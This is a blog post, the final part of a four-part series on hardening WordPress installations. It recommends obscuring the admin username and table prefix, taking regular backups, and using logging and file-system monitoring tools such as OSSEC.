WordPress has come a long way from being launched in 2003 as a blogging platform to being the most preferred CMS by web professionals all over the world. WordPress now forms the backbone of websites of most big names in the online world. As discussed in previous posts, the strength of WordPress lies in being open sourced but this also acts as a disadvantage as it’s now hackers favored target. You need to take a number of hardening steps to prevent your WP installation from being hacked. And, hence this post.
In our previous blogposts (Blog 1, Blog 2, and Blog 3) on WordPress security, we discussed about webserver and database security; vulnerabilities related to network and WordPress; how you can secure your site by using a strong password and two-level authentication; why it is important to go for protected file transfer and restricting file permissions; safeguarding wp-admin, wp-includes, wp-config.php, disallowing file editing & updating plugins and few other steps that you should consider taking care of, for hardening your WordPress installation.
In this blog post, we will discuss some more steps for securing your WordPress site- by remaining inconspicuous, taking regular data backups, and logging and monitoring.
13. Security by discretion
Securing yourself by remaining inconspicuous may not sound like a very solid security strategy but obscuring information in certain places in your WordPress installation may help you in increasing its security.
Naming your administrative account:
While creating your administrative account, you need to forego simple usernames like webmaster or admin as they can be guessed very easily and are usually the first ones to be attacked. In case of an existing WordPress installation, you can rename your administrative account by utilizing a MySQL frontend like phpMyAdmin or in the MySQL command-line client with a command like UPDATE wp_users SET user_login = ‘newuser’ WHERE user_login = ‘admin’.
Changing the table_prefix:
A number of SQL-injection attacks published especially for WordPress assume that by default wp_ is table_prefix. It’s recommended to change this in order to block at least a few SQL injection attacks.
14. Regular Data Backup
One of the most important steps that you can take to maintain the integrity of your data is through regular back up of your data, including backing up MySQL databases. In order to be confident that your data has not been altered, you can encrypt the backup, maintain a separate account of MD5 hashes for every file that’s backed up, and/or take backup only on read-only media.
A strategic data security technique would be to maintain a set of time spaced snapshots of your complete WordPress installation, including database and core files in a safe location. This would help in recreating the site in case it is compromised.
15. Logging & Monitoring
With the help of forensic logs, you can keep a track of any activity on your website. Logs may not tell you the username of the logged in person directly but they will surely help you in identifying the IP address and time through which any changes might have taken place. Furthermore, you can view any brute force attempts or attacks, like Directory Traversal attempts, Cross Site Scripting (XSS), Local File Inclusion (LFI) and Remote File Inclusion (RFI) through the logs.
You may adopt a layered approach towards security by utilizing an open-source solution, like OSSEC on your web server. It can run on both Windows and any NIX distribution. It provides a powerful platform for monitoring and controlling your systems by mixing log monitoring, HIDS (host-based intrusion detection) and SIM/SIEM together. You just have to ensure that it should be configured to capture full error_logs and access_logs in case many websites are running on the server account.
A number of times, prevention may not suffice and hacking may take place. So continuous monitoring or intrusion detection is the need of the day. It enables you to be prepared and recover your site’s data in case of any untoward incident.
On dedicated or virtual private server, you have root access and so you can configure things and keep an eye on what’s happening. OSSEC also helps in monitoring your logs.
In case of an attack, its traces mostly gets recorded on the file system or on logs. OSSEC can also monitor files and can alert you in case of any changes. System admins can keep a track of file system through general technologies like revision control, system utilities and Kernel/OS level monitoring. Multiple tools are available for file system monitoring, like OSSEC, Git –which can be used for source code management, diff– which can be used for building neat test copy of your site and then comparing it later against main site files etc.
On configuring a monitoring technique based on file system, a number of considerations should be taken care of:
- Running the monitoring service/script as root:
It would become harder for attackers to change or disable your file system tracking solution.
- Disabling monitoring at the time of upgradation/scheduled maintenance:
It would help in preventing unnecessary notices during regular site maintenance.
- Monitoring executable filetypes only:
Unnecessary alerts and log entries can be prevented by keeping a track of executable files only, like .php files.
- Using stringent file system permissions:
As discussed in our second blog on WordPress security, read and write permissions should be as restricted as possible. You can read about it in detail in blog post 2.
-External monitoring of web server:
You can monitor your website on a regular basis by using a malware detection tool. Such tools keep an eye on any injected malware and notify you on time to take necessary action.
NOTE: This blog is fourth and last part of a four blog series on WordPress hardening. Part 1, Part 2 and Part 3 are already live. If you have any query regarding this series or this post in particular, please let me know using the comments section below. I will be happy to respond. 🙂